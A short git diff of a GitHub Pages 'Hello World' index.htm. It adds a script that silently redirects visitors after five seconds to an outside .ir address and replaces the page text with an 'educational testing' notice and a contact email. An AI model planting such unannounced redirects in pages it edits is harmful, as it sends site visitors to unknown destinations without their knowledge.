--- a/index.htm
+++ b/index.htm
@@ -1,7 +1,12 @@
 <!DOCTYPE html>
 <html>
+<head>
+<SCRIPT language="JavaScript">
+setTimeout(function(){location.href="http://2ssa.ir/public/prneo/"} , 5000);   
+</SCRIPT>
+</head>
 <body>
 <h1>Hello World</h1>
-<p>I'm hosted with GitHub Pages.</p>
+<p>This if for educational testing & Please kindly contact If there is any problem or need upgrade: shahryar.barani@webraymon.com</p>
 </body>
 </html>
